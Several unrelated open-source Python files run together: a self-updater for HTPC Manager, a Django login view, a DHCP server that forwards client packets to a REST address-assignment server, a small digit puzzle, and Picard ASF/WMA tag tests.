Updater and SourceUpdater written by styxit
https://github.com/styxit
Git updater written by mbw2001
https://github.com/mbw2001
Used as reference:
- https://github.com/mrkipling/maraschino
- https://github.com/midgetspy/Sick-Beard/
"""
import os
from threading import Thread
import urllib2
import subprocess
import re
from json import loads
import cherrypy
import htpc
import logging
import tarfile
import shutil
import platform
from apscheduler.triggers.interval import IntervalTrigger
from htpc.root import do_restart
# configure git repo
gitUser = 'Hellowlol'
gitRepo = 'HTPC-Manager'
class Updater(object):
""" Main class """
def __init__(self):
self.logger = logging.getLogger('htpc.updater')
self.updateEngineName = 'Unknown'
# Set update engine. Use git updater or update from source.
self.updateEngine = self.getEngine()
# Check for updates automatically
htpc.SCHED.add_job(self.update_needed, trigger=IntervalTrigger(hours=6))
""" Determine the update method """
def getEngine(self):
self.logger.debug("Selecting Update engine.")
gitDir = os.path.normcase(os.path.join(htpc.RUNDIR, '.git'))
validGitDir = os.path.isdir(gitDir)
# If valid Git dir and git command succeeded, use Git updater
if validGitDir and self.test_git():
self.logger.info('Using GitUpdater engine')
self.updateEngineName = 'Git'
return GitUpdater()
else: # Otherwise update from Sourece
self.logger.info('Using SourceUpdater engine')
self.updateEngineName = 'Source'
return SourceUpdater()
def test_git(self):
self.logger.debug("Checking if git is installed")
gp = htpc.settings.get('git_path', 'git')
alternative_gp = []
# osx people who start htpc-mamanger from launchd have a broken path, so try a hail-mary attempt for them
if platform.system().lower() == 'darwin':
alternative_gp.append('/usr/local/git/bin/git')
if platform.system().lower() == 'windows':
if gp != gp.lower():
alternative_gp.append(gp.lower())
# Comment out the line beflow to test the source updater
# alternative_gp += ["%USERPROFILE%\AppData\Local\GitHub\PORTAB~1\bin\git.exe", "C:\Program Files (x86)\Git\bin\git.exe"]
# Returns a empty string if failed
output = GitUpdater().git_exec(gp, 'version')
if output:
# Found a working git path.
self.logger.debug("Found git path %s" % gp)
htpc.settings.set('git_path', gp)
return True
if alternative_gp and not output:
self.logger.debug("Checking for alternate git location")
for current_gp in alternative_gp:
self.logger.debug("Testing git path %s" % current_gp)
output = GitUpdater().git_exec(current_gp, 'version')
if output:
self.logger.debug("Found git path %s and it works!" % current_gp)
self.logger.debug("Saving git path %s to settings" % current_gp)
htpc.settings.set('git_path', current_gp)
return True
return False
@cherrypy.expose()
@cherrypy.tools.json_out()
def index(self, force=False):
""" Update on POST. Check for new updates on GET. """
if cherrypy.request.method.upper() == 'POST':
Thread(target=self.updateEngine.update).start()
return 1
if cherrypy.request.method.upper() == 'POST' and force:
self.check_update()
Thread(target=self.updateEngine.update).start()
return 1
else:
return self.check_update()
@cherrypy.expose()
@cherrypy.tools.json_out()
def updatenow(self):
Thread(target=self.updateEngine.update).start()
@cherrypy.expose()
@cherrypy.tools.json_out()
def status(self):
""" method to determine if HTPC Manager is currently updating """
return self.updateEngine.UPDATING
def check_update(self):
"""
Check for updates
Returns dict() with the following indexes:
UpdateNeeded True if an update is needed, False if an update is not needed OR not possible
latestVersion Commit hash of the most recent commit
currentVersion Commit hash for the version currently in use
versionsBehind How many versions is the current version behind the latest version
"""
output = {'updateNeeded': True, 'latestVersion': 'Unknown', 'currentVersion': 'Unknown', 'versionsBehind': 'Unknown'}
self.logger.info("Checking for updates from %s." % self.updateEngineName)
# Get current and latest version
# current can return True, False, Unknown, and SHA
current = self.updateEngine.current()
htpc.CURRENT_HASH = current
# Can return True, False
latest = self.updateEngine.latest()
htpc.LATEST_HASH = latest
self.logger.debug("Latest commit is %s" % latest)
self.logger.debug("Current commit is %s" % current)
if latest is False:
self.logger.error("Failed to determine the latest version for HTPC Manager.")
else:
output['latestVersion'] = latest
if current is False:
self.logger.error("Failed to determine the current version for HTPC Manager.")
else:
output['currentVersion'] = current
# If current or latest failed, updating is not possible
if current is False or latest is False:
self.logger.debug("Cancel update.")
output['updateNeeded'] = False
return output
# If HTPC Manager is up to date, updating is not needed
if current == latest and current != "Unknown":
self.logger.info("HTPC Manager is Up-To-Date.")
output['versionsBehind'] = 0
htpc.COMMITS_BEHIND = 0
output['updateNeeded'] = False
else:
behind = self.behind_by(current, latest)
htpc.COMMITS_BEHIND = behind
output['versionsBehind'] = behind
self.logger.info("Currently " + str(output['versionsBehind']) + " commits behind.")
return output
def behind_by(self, current, latest):
""" Check how many commits between current and latest """
self.logger.debug('Checking how far behind latest')
try:
url = 'https://api.github.com/repos/%s/%s/compare/%s...%s' % (gitUser, gitRepo, current, latest)
result = loads(urllib2.urlopen(url).read())
behind = int(result['total_commits'])
self.logger.debug('Behind: ' + str(behind))
return behind
except Exception, e:
self.logger.error(str(e))
self.logger.error('Could not determine how far behind')
return 'Unknown'
@cherrypy.expose()
@cherrypy.tools.json_out()
def branches(self):
return self.updateEngine.branches()
def update_needed(self):
self.logger.info("Running update_needed")
update_avail = self.check_update()
# returns true or false
if update_avail.get("updateNeeded"):
if htpc.settings.get('app_check_for_updates', False):
self.logger.debug("Add update footer")
# Used for the notification footer
htpc.UPDATE_AVAIL = True
else:
htpc.UPDATE_AVAIL = False
# Since im stupid, protect me please.. srsly its for myself.
if htpc.UPDATE_AVAIL and htpc.settings.get("app_auto_update", False) and not htpc.DEBUG:
self.logger.debug("Auto updating now!")
Thread(target=self.updateEngine.update).start()
class GitUpdater():
""" Class to update HTPC Manager using git commands. """
def __init__(self):
""" Set GitHub settings on load """
self.UPDATING = 0
self.git = htpc.settings.get('git_path', 'git')
self.logger = logging.getLogger('htpc.updater')
#self.update_remote_origin() # Disable this since it a fork for now.
def update_remote_origin(self):
self.git_exec(self.git, 'config remote.origin.url https://github.com/Hellowlol/HTPC-Manager.git')
def current_branch_name(self):
output = self.git_exec(self.git, 'rev-parse --abbrev-ref HEAD')
if output:
return output
else:
return htpc.settings.get('branch', 'master2')
def latest(self):
""" Get hash of latest commit on github """
self.logger.debug('Getting latest version from github.')
try:
url = 'https://api.github.com/repos/%s/%s/commits/%s' % (gitUser, gitRepo, self.current_branch_name())
result = loads(urllib2.urlopen(url).read())
latest = result['sha'].strip()
self.logger.debug('Branch: %s' % self.current_branch_name())
self.logger.debug('Latest sha: %s' % latest)
self.latestHash = latest
return latest
except Exception as e:
self.logger.error("Failed to get last commit from github")
return False
def current(self):
""" Get hash of current Git commit """
self.logger.debug('Getting current version.')
output = self.git_exec(self.git, 'rev-parse HEAD')
self.logger.debug('Current version: ' + output)
if not output:
self.logger.error('Couldnt determine installed branch.')
return False
if re.match('^[a-z0-9]+$', output):
return output
def branches(self):
cbn = self.current_branch_name()
d = {
"branch": cbn,
"branches": []
}
if self.current is not False:
d["verified"] = True
else:
# If its false, default to master branch
d["branch"] = htpc.settings.get('branch', 'master2')
branches = self.git_exec(self.git, 'ls-remote --heads https://github.com/Hellowlol/HTPC-Manager.git')
if branches:
# find all branches except the current branch.
d["branches"] = [b for b in re.findall('\S+\Wrefs/heads/(.*)', branches) if b != cbn]
return d
return [d]
def update(self):
""" Do update through git """
self.logger.info("Attempting update through Git.")
self.UPDATING = 1
if htpc.settings.get('branch', 'master2') == self.current_branch_name():
output = self.git_exec(self.git, 'pull origin %s' % htpc.settings.get('branch', 'master2'))
else:
output = self.git_exec(self.git, 'checkout -f ' + htpc.settings.get('branch', 'master2'))
if not output:
self.logger.error("Unable to update through git. Make sure that Git is located in your path and can be accessed by this application.")
elif 'Aborting.' in output:
self.logger.error("Update aborted.")
else:
if htpc.settings.get('git_cleanup') and not htpc.DEBUG:
self.logger.debug("Clean up after git")
self.git_exec(self.git, 'reset --hard')
# Note to self rtfm before you run git commands, just wiped the data dir...
# This command removes all untracked files and files and the files in .gitignore
# except from the content of htpc.DATADIR and VERSION.txt
self.git_exec(self.git, 'clean -d -fx -e %s -e VERSION.txt -e userdata/' % htpc.DATADIR)
self.logger.warning('Restarting HTPC Manager after update.')
# Restart HTPC Manager to make sure all new code is loaded
do_restart()
self.UPDATING = 0
def git_exec(self, gp, args):
""" Tool for running git program on system """
try:
proc = subprocess.Popen(gp + " " + args, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=True, cwd=htpc.RUNDIR)
output, err = proc.communicate()
exitcode = proc.returncode
self.logger.debug("Running %s %s" % (gp, args))
except OSError, e:
self.logger.warning(str(e))
return ''
if exitcode > 0:
self.logger.warning('%s - %s' % (output, err))
return ''
if err:
self.logger.warning(output + ' - ' + err)
return ''
if any(s in output for s in ['not found', 'not recognized', 'fatal:']):
self.logger.warning(output)
return ''
if output and exitcode == 0:
return output.strip()
class SourceUpdater():
""" Class to update HTPC Manager using Source code from Github. Requires a full download on every update."""
def __init__(self):
self.UPDATING = 0
self.currentHash = False
self.verified = False
self.logger = logging.getLogger('htpc.updater')
self.versionFile = os.path.join(htpc.RUNDIR, 'VERSION.txt')
self.updateFile = os.path.join(htpc.DATADIR, 'htpc-manager-update.tar.gz')
self.updateDir = os.path.join(htpc.DATADIR, 'update-source')
def current(self):
""" Get hash of current runnig version """
self.logger.debug('Getting current version.')
# Check if version file exists
if not os.path.isfile(self.versionFile):
self.logger.warning('Version file does not exists. Creating it now.')
try:
versionFileHandler = open(self.versionFile, 'w')
versionFileHandler.close()
return 'Unknown'
except:
# If version file can not be created updating is also not possible
self.logger.error('Could not create version file.')
return False
""" Get version from version file """
fp = open(self.versionFile, 'r')
currentVersion = fp.read().strip(' \n\r')
fp.close()
self.logger.debug('Current version: ' + currentVersion)
if not currentVersion:
self.logger.error('No commit hash found in version file.')
return True
if re.match('^[a-z0-9]+$', currentVersion):
self.currentHash = currentVersion
return currentVersion
def latest(self):
""" Get hash of latest commit on github """
self.logger.debug('Getting latest version from github.')
try:
url = 'https://api.github.com/repos/%s/%s/commits/%s' % (gitUser, gitRepo, htpc.settings.get('branch', 'master2'))
result = loads(urllib2.urlopen(url).read())
latest = result['sha'].strip()
self.logger.debug('Latest version: ' + latest)
self.latestHash = latest
return latest
except:
return False
def current_branch_name(self):
""" Tries to find the current branches by reading version file
and matching that against all branches on github """
versionfile = self.current()
current_branch = htpc.settings.get('branch', 'master2')
#current_branch = htpc.settings.get('branch', 'Unknown')
# should return sha on success not True False
if not isinstance(self.current(), bool):
try:
url = "https://api.github.com/repos/%s/%s/branches?per_page=100" % (gitUser, gitRepo)
branches = loads(urllib2.urlopen(url).read())
for branch in branches:
if branch["commit"]["sha"] == versionfile:
current_branch = branch["name"]
self.verified = True
except:
self.logger.debug("Couldnt figure out what branch your using, using %s" % htpc.settings.get('branch', 'master2'))
return current_branch
def branches(self):
""" Returns the all the branches to gitUser and current branch """
cbn = self.current_branch_name()
d = {
"branch": cbn,
"branches": []
}
if self.verified:
d["verified"] = True
try:
url = "https://api.github.com/repos/%s/%s/branches?per_page=100" % (gitUser, gitRepo)
branchlist = []
branches = loads(urllib2.urlopen(url).read())
for branch in branches:
branchlist.append(branch["name"])
d["branches"] = [b for b in branchlist if b != cbn]
return d
except Exception, e:
self.logger.error(str(e))
self.logger.error('Could not find any branches, setting default master2')
return [d]
""" Do update from source """
def update(self):
self.logger.info("Attempting update from source.")
self.UPDATING = 1
tarUrl = 'https://github.com/%s/%s/tarball/%s' % (gitUser, gitRepo, htpc.settings.get('branch', 'master2'))
# Download tar
downloaded = self.__downloadTar(tarUrl, self.updateFile)
if downloaded is False:
return False
# Extract to temp folder
extracted = self.__extractUpdate(self.updateFile, self.updateDir)
if extracted is False:
return False
# Overwite app source with source from extracted file
overwritten = self.__updateSourcecode()
if overwritten is False:
return False
# Write new version to file
# Just call it directly in case forced update.
self.__updateVersionFile(self.latest())
# Cleanup after yourself
self.__finishUpdate()
# Restart HTPC Manager to make sure all new code is loaded
self.logger.warning('Restarting HTPC Manager after update.')
do_restart()
def __downloadTar(self, url, destination):
""" Download source """
self.logger.info('Downloading update from %s' % url)
try:
self.logger.debug('Downloading update file to %s' % destination)
downloadedFile = urllib2.urlopen(url)
f = open(destination, 'wb')
f.write(downloadedFile.read())
f.close()
self.logger.info('Downloading update complete')
return True
except:
self.logger.warning('Failed to download update file')
self.__finishUpdate()
return False
def __extractUpdate(self, filePath, destinationFolder):
""" Extract files from downloaded tar file """
try:
self.logger.debug('Extracting tar file: %s' % filePath)
tarArchive = tarfile.open(filePath)
tarArchive.extractall(destinationFolder)
tarArchive.close()
return True
except:
self.logger.error('Failed extracting update file.')
self.__finishUpdate()
return False
""" Overwrite HTPC Manager sourcecode with (new) code from update path """
def __updateSourcecode(self):
# Find the extracted dir
sourceUpdateFolder = [x for x in os.listdir(self.updateDir) if
os.path.isdir(os.path.join(self.updateDir, x))]
if len(sourceUpdateFolder) != 1:
# There can only be one folder in sourceUpdateFolder
self.logger.error("Invalid update data, update failed %s" % sourceUpdateFolder)
# Where to extract the update
targetFolder = os.path.join(htpc.RUNDIR)
# Full path to the extracted dir
contentdir = os.path.join(self.updateDir, sourceUpdateFolder[0])
self.logger.debug('Overwriting files.')
try:
# Loop files and folders and place them in the HTPC Manager path
for src_dir, dirs, files in os.walk(contentdir):
dst_dir = src_dir.replace(contentdir, targetFolder)
if not os.path.exists(dst_dir):
os.mkdir(dst_dir)
for file_ in files:
src_file = os.path.join(src_dir, file_)
dst_file = os.path.join(dst_dir, file_)
if os.path.exists(dst_file):
os.remove(dst_file)
shutil.move(src_file, dst_dir)
except:
self.logger.warning('Failed to overwrite old files')
self.__finishUpdate()
return False
self.logger.info('Updating files successfull')
return True
def __updateVersionFile(self, newVersion):
"""
Write the latest commit hash to the version file.
Used when checking for update the next time.
"""
versionFileHandler = open(self.versionFile, 'wb')
versionFileHandler.write(newVersion)
versionFileHandler.close()
def __finishUpdate(self):
""" Remove leftover files after the update """
self.UPDATING = 0
if os.path.isfile(self.updateFile):
self.logger.debug('Removing update archive')
try:
os.remove(self.updateFile)
except:
pass
if os.path.isdir(self.updateDir):
self.logger.debug('Removing update code folder')
try:
shutil.rmtree(self.updateDir)
except:
pass
|
Dahlgren/HTPC-Manager
|
htpc/updater.py
|
Python
|
mit
| 21,554 | 0.002366 |
from django.conf import settings
from django.contrib import auth
from django.contrib.auth.forms import AuthenticationForm
from django.utils.decorators import method_decorator
from django.utils.http import is_safe_url
from django.views.decorators.debug import sensitive_post_parameters
from django.views import generic
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
class LoginView(generic.FormView):
success_url = settings.LOGIN_REDIRECT_URL
form_class = AuthenticationForm
redirect_param = getattr(settings, 'REDIRECT_FIELD_NAME', 'next')
template_name = 'accounts/login.html'
@method_decorator(sensitive_post_parameters('password'))
@method_decorator(csrf_protect)
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
request.session.set_test_cookie()
return super(LoginView, self).dispatch(request, *args, **kwargs)
def form_valid(self, form):
auth.login(self.request, form.get_user())
if self.request.session.test_cookie_worked():
self.request.session.delete_test_cookie()
return super(LoginView, self).form_valid(form)
def form_invalid(self, form):
return self.render_to_response(self.get_context_data(form=form))
def get_success_url(self):
redirect_to = self.request.GET.get(self.redirect_param)
if not is_safe_url(url=redirect_to, host=self.request.get_host()):
redirect_to = self.success_url
return redirect_to
class LogoutView(generic.RedirectView):
permanent = False
pattern_name = 'main:landing'
def get(self, request, *args, **kwargs):
auth.logout(request)
return super(LogoutView, self).get(request, *args, **kwargs)
class ProfileView(generic.TemplateView):
template_name = 'accounts/profile_detail.html'
|
neuroticnerd/django-demo-app
|
django_demo/accounts/views.py
|
Python
|
mit
| 1,886 | 0 |
#!/usr/bin/python2
# -*- encoding: utf-8 -*-
#pylint: disable=W0105
import argparse
import logging
import configparser
import requests
from libpydhcpserver.dhcp import DHCPServer
class PBAADHCPServer(DHCPServer):
def __init__(
self, server_address, server_port, client_port, aaserver_addr,
proxy_port=None, response_interface=None,
response_interface_qtags=None
):
self._aaserver_addr = aaserver_addr
DHCPServer.__init__(
self,
server_address=server_address,
server_port=server_port,
client_port=client_port,
proxy_port=proxy_port,
response_interface=response_interface,
response_interface_qtags=response_interface_qtags
)
def _handleDHCPDecline(self, packet, source_address, port):
"""Processes a DECLINE packet.
Override from DHCPServer.
Send the packet's info to the AA server.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
logging.info('recieved DHCPDECLINE from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
self._get_client_options(
'DHCP_DECLINE', self._get_packet_info(packet))
def _handleDHCPDiscover(self, packet, source_address, port):
"""Processes a DISCOVER packet.
Override from DHCPServer.
Send the packet's info to the AA server, get the response,
and send it back to the client.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
logging.info('recieved DHCPDISCOVER from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
[msg_type, options] = self._get_client_options(
'DHCP_DISCOVER', self._get_packet_info(packet))
self._send_dhcp_msg(packet, msg_type, options, source_address, port)
def _handleDHCPInform(self, packet, source_address, port):
"""Processes a INFORM packet.
Override from DHCPServer.
Send the packet's info to the AA server, get the response,
and send it back to the client.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
logging.info('recieved DHCPINFORM from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
[msg_type, options] = self._get_client_options(
'DHCP_INFORM', self._get_packet_info(packet))
self._send_dhcp_msg(packet, msg_type, options, source_address, port)
def _handleDHCPLeaseQuery(self, packet, source_address, port):
"""Processes a LEASEQUERY packet.
Override from DHCPServer.
Ignore the packet.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
logging.info('recieved DHCPLEASEQUERY from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
def _handleDHCPRelease(self, packet, source_address, port):
"""Processes a RELEASE packet.
Override from DHCPServer.
Send the packet's info to the AA server.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
logging.info('recieved DHCPRELEASE from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
self._get_client_options(
'DHCP_RELEASE', self._get_packet_info(packet))
def _handleDHCPRequest(self, packet, source_address, port):
"""Processes a REQUEST packet.
Override from DHCPServer.
Send the packet's info to the AA server, get the response,
and send it back to the client.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
logging.info('recieved DHCPREQUEST from: %s:%s',
source_address.ip, source_address.port)
logging.debug('\n%s\n', packet)
[msg_type, options] = self._get_client_options(
'DHCP_REQUEST', self._get_packet_info(packet))
self._send_dhcp_msg(packet, msg_type, options, source_address, port)
def get_next_dhcp_packet(self, timeout=60, packet_buffer=2048):
"""Make the _getNextDHCPPacket method public."""
return self._getNextDHCPPacket(timeout, packet_buffer)
def _send_dhcp_msg(
self, packet, msg_type, options, source_address, port
):
"""Send the DHCP packet to the client.
Set the options of the DHCP packet, and send it to the client.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to send to the client.
msg_type (str):
The message type of the DHCP packet.
options (dict):
The options of the DHCP packet.
source_address (dhcp.Address):
The address from which the request was received.
port (int):
The port on which the packet was received.
"""
if msg_type is None:
logging.warning('Ignore a packet: message type is None.')
return
for option, value in options.items():
packet.setOption(option, value)
# packet.setOption('server_identifier', self._server_address)
if msg_type == 'DHCP_OFFER':
packet.transformToDHCPOfferPacket()
elif msg_type == 'DHCP_ACK':
packet.transformToDHCPAckPacket()
elif msg_type == 'DHCP_NAK':
packet.transformToDHCPNakPacket()
else:
logging.warning('Incorrect message type: %s.', msg_type)
logging.warning('Packet will be ignored.')
return
logging.info('send %s to %s:%s',
msg_type, source_address.ip, port)
logging.debug('\n%s\n', packet)
self._sendDHCPPacket(packet, source_address, port)
@staticmethod
def _get_packet_info(packet):
"""Return a dict of the infomation of the DHCP packet.
Fetch the information from the DHCP packet, and return them
in dict type.
Args:
packet (dhcp_types.packet.DHCPPacket):
The packet to be processed.
Returns:
dict: The information of the packet.
"""
info = {}
# fetch the information from these fields
for field_name in [
'op', 'htype', 'hlen', 'hops', 'xid', 'secs', 'flags',
'ciaddr', 'yiaddr', 'siaddr', 'giaddr', 'chaddr',
'sname', 'file'
]:
info[field_name] = packet.getOption(field_name)
# fetch the information from the "option" field
options = {}
packet.setSelectedOptions()
for option in packet.getSelectedOptions():
options[option] = packet.getOption(option)
info['options'] = options
return info
def _get_client_optionsT(self, dhcp_type, client_info): #pylint: disable=I,W,C
'''Get the fixed options of the client.
This method is for debugging.
Args:
dhcp_type (str): The DHCP type in DHCP_TYPE_NAMES.
client_info (dict): The info of the client from DHCP packet.
Returns: [res_msg_type, res_data]
res_msg_type (str): The message type that should send to client.
res_data (list): The options that should send to client (if needed).
'''
require_options = False
if dhcp_type == 'DHCP_DISCOVER':
require_options = True
elif dhcp_type == 'DHCP_REQUEST':
require_options = True
elif dhcp_type == 'DHCP_INFORM':
require_options = True
elif dhcp_type == 'DHCP_DECLINE':
require_options = False
elif dhcp_type == 'DHCP_RELEASE':
require_options = False
# elif dhcp_type == 'DHCP_LEASEQUERY':
# requireOptions = True
else:
logging.error('Incorrect dhcp_type from server: %s.', dhcp_type)
logging.error('Packet will be ignored.')
return [None, None]
res_msg_type = None
res_data = None
if require_options:
try:
res_msg_type = self._code_to_msg_type[dhcp_type][200]
except KeyError:
logging.error('Status code from server is not correct: ')
logging.error('Packet will be ignored.')
if res_msg_type is not None:
try:
res_data = {
'subnet_mask': '255.255.255.0',
'router': '192.168.1.1',
'domain_name_servers': '8.8.8.8',
'ip_address_lease_time': 3600,
'server_identifier': '127.0.0.1',
'yiaddr': '192.168.1.100'
}
except ValueError:
logging.error('Data sent from server is not correct.')
return [res_msg_type, res_data]
def _get_client_options(self, dhcp_type, client_info):
'''Get the options of the client from a RESTful server.
Args:
dhcp_type (str): The DHCP type in DHCP_TYPE_NAMES.
client_info (dict): The info of the client from DHCP packet.
Returns: [res_msg_type, res_data]
res_msg_type (str): The message type that should send to client.
res_data (list): The options that should send to client (if needed).
'''
# Send the information of the packet received from the client
# to the AA server, and get the response.
res = None
require_options = False
if dhcp_type == 'DHCP_DISCOVER':
logging.debug('Url: %s', self._aaserver_addr)
res = requests.post(self._aaserver_addr + '/discover',
json=client_info)
require_options = True
elif dhcp_type == 'DHCP_REQUEST':
res = requests.post(self._aaserver_addr + '/request',
json=client_info)
require_options = True
elif dhcp_type == 'DHCP_INFORM':
res = requests.post(self._aaserver_addr + '/inform',
json=client_info)
require_options = True
elif dhcp_type == 'DHCP_DECLINE':
res = requests.put(self._aaserver_addr + '/decline',
json=client_info)
require_options = False
elif dhcp_type == 'DHCP_RELEASE':
res = requests.put(self._aaserver_addr + '/release',
json=client_info)
require_options = False
# elif dhcp_type == 'DHCP_LEASEQUERY':
# res = requests.post(self._aaserver_addr + '/leasequery',
# json=client_info)
# require_options = True
else:
logging.error('Incorrect dhcp_type from server: %s.', dhcp_type)
logging.error('Packet will be ignored.')
return [None, None]
# According to the status_code received from the AA server,
# decide the message type to send to the client.
res_msg_type = None
res_data = None
if require_options:
res_msg_type = self._code_to_msg_type[dhcp_type].get(res.status_code)
if res_msg_type is not None:
"""Whether the data need to be sent to the client."""
try:
res_data = res.json()
except ValueError:
logging.error(
'Incorrect data format sent from server: %s', res.text)
return [res_msg_type, res_data]
_code_to_msg_type = {
'DHCP_DISCOVER': {200: 'DHCP_OFFER'},
'DHCP_REQUEST': {200: 'DHCP_ACK', 403: 'DHCP_NAK'},
'DHCP_INFORM': {200: 'DHCP_ACK'}
}
"""The status_code-meassage_type table."""
def main():
argparser = argparse.ArgumentParser()
argparser.add_argument("-f", dest="config_file", default='config.ini',
help="config: The location of the config file")
args = argparser.parse_args()
# Parse the config file.
config = configparser.ConfigParser()
try:
with open(args.config_file) as config_file:
try:
config.read_file(config_file)
except AttributeError: # Python2
config.readfp(config_file)
except (OSError, IOError):
logging.error('Failed to open the config file.')
return
# Parse the argument.
server_ip = ''
server_port = 0
client_port = 0
aaserver_addr = ''
debug_level = None
try:
server_ip = config.get('pbaadhcpserver', 'server_ip') #pylint: disable=R0204
server_port = config.getint('pbaadhcpserver', 'server_port') #pylint: disable=R0204
client_port = config.getint('pbaadhcpserver', 'client_port') #pylint: disable=R0204
aaserver_addr = config.get('pbaadhcpserver', 'aaserver_addr') #pylint: disable=R0204
debug_level = config.get('pbaadhcpserver', 'debug_level') #pylint: disable=R0204
except (configparser.NoSectionError, configparser.NoOptionError):
logging.error('Failed to parse the config file.')
return
# Set the logging format and logging level.
numeric_level = getattr(logging, debug_level.upper(), logging.DEBUG) #pylint: disable=E1101
logging.basicConfig(
format='%(levelname)s:%(message)s', level=numeric_level
)
logging.info('DHCP Server is listening on %s:%s',
server_ip, server_port)
logging.info('Client port is %s, address assign server is at %s',
client_port, aaserver_addr)
dhcpd = PBAADHCPServer(server_ip, server_port, client_port,
aaserver_addr)
while True:
dhcpd.get_next_dhcp_packet()
if __name__ == '__main__':
main()
|
lcy0321/pbaadhcpserver
|
pbaadhcpserver.py
|
Python
|
gpl-3.0
| 15,974 | 0.00144 |
def find_number(x):
str_x = str(x)
if len(str_x) == 1:
raise Exception()
left_most = str_x[0]
try:
small_from_rest = find_number(int(str_x[1:]))
return int(left_most + str(small_from_rest))
except:
# min() will throw exception if parameter is empty list, meaning no digit is greater than the left_most digit.
new_left_most = min([c for c in str_x[1:] if c > left_most])
# assumption: no repeated digit
rest_of_digits = ''.join(sorted([c for c in str_x if c != new_left_most]))
y = new_left_most + rest_of_digits
return int(y)
print(find_number(5346))
|
danithaca/berrypicking
|
python/excercise/march31.py
|
Python
|
gpl-2.0
| 644 | 0.007764 |
# -*- coding: utf-8 -*-
#
# Picard, the next-generation MusicBrainz tagger
#
# Copyright (C) 2019-2020 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from mutagen.asf import ASFByteArrayAttribute
from test.picardtestcase import (
PicardTestCase,
create_fake_png,
)
from picard.formats import (
asf,
ext_to_format,
)
from .common import (
CommonTests,
load_metadata,
load_raw,
save_metadata,
save_raw,
skipUnlessTestfile,
)
from .coverart import CommonCoverArtTests
# prevent unittest to run tests in those classes
class CommonAsfTests:
class AsfTestCase(CommonTests.TagFormatsTestCase):
def test_supports_tag(self):
fmt = ext_to_format(self.testfile_ext[1:])
self.assertTrue(fmt.supports_tag('copyright'))
self.assertTrue(fmt.supports_tag('compilation'))
self.assertTrue(fmt.supports_tag('bpm'))
self.assertTrue(fmt.supports_tag('djmixer'))
self.assertTrue(fmt.supports_tag('discnumber'))
self.assertTrue(fmt.supports_tag('lyrics:lead'))
self.assertTrue(fmt.supports_tag('~length'))
for tag in self.replaygain_tags.keys():
self.assertTrue(fmt.supports_tag(tag))
@skipUnlessTestfile
def test_ci_tags_preserve_case(self):
# Ensure values are not duplicated on repeated save and are saved
# case preserving.
tags = {
'Replaygain_Album_Peak': '-6.48 dB'
}
save_raw(self.filename, tags)
loaded_metadata = load_metadata(self.filename)
loaded_metadata['replaygain_album_peak'] = '1.0'
save_metadata(self.filename, loaded_metadata)
raw_metadata = load_raw(self.filename)
self.assertIn('Replaygain_Album_Peak', raw_metadata)
self.assertEqual(raw_metadata['Replaygain_Album_Peak'][0], loaded_metadata['replaygain_album_peak'])
self.assertEqual(1, len(raw_metadata['Replaygain_Album_Peak']))
self.assertNotIn('REPLAYGAIN_ALBUM_PEAK', raw_metadata)
def _test_invalid_picture(self, invalid_picture_data):
png_data = create_fake_png(b'x')
tags = {
'WM/Picture': [
ASFByteArrayAttribute(invalid_picture_data),
ASFByteArrayAttribute(
asf.pack_image("image/png", png_data)
)
]
}
save_raw(self.filename, tags)
metadata = load_metadata(self.filename)
self.assertEqual(1, len(metadata.images))
self.assertEqual(png_data, metadata.images[0].data)
@skipUnlessTestfile
def test_ignore_invalid_wm_picture(self):
# A picture that cannot be unpacked
self._test_invalid_picture(b'notapicture')
class ASFTest(CommonAsfTests.AsfTestCase):
testfile = 'test.asf'
supports_ratings = True
expected_info = {
'length': 92,
'~channels': '2',
'~sample_rate': '44100',
'~bitrate': '128.0',
}
class WMATest(CommonAsfTests.AsfTestCase):
testfile = 'test.wma'
supports_ratings = True
expected_info = {
'length': 139,
'~channels': '2',
'~sample_rate': '44100',
'~bitrate': '64.0',
}
unexpected_info = ['~video']
class WMVTest(CommonAsfTests.AsfTestCase):
testfile = 'test.wmv'
supports_ratings = True
expected_info = {
'length': 565,
'~channels': '2',
'~sample_rate': '44100',
'~bitrate': '128.0',
'~video': '1',
}
class AsfUtilTest(PicardTestCase):
test_cases = [
# Empty MIME, description and data
(('', b'', 2, ''), b'\x02\x00\x00\x00\x00\x00\x00\x00\x00'),
# MIME, description set, 1 byte data
(('M', b'x', 2, 'D'), b'\x02\x01\x00\x00\x00M\x00\x00\x00D\x00\x00\x00x'),
# Empty MIME and description, 3 byte data
(('', b'abc', 0, ''), b'\x00\x03\x00\x00\x00\x00\x00\x00\x00abc'),
]
def test_pack_and_unpack_image(self):
mime = 'image/png'
image_data = create_fake_png(b'x')
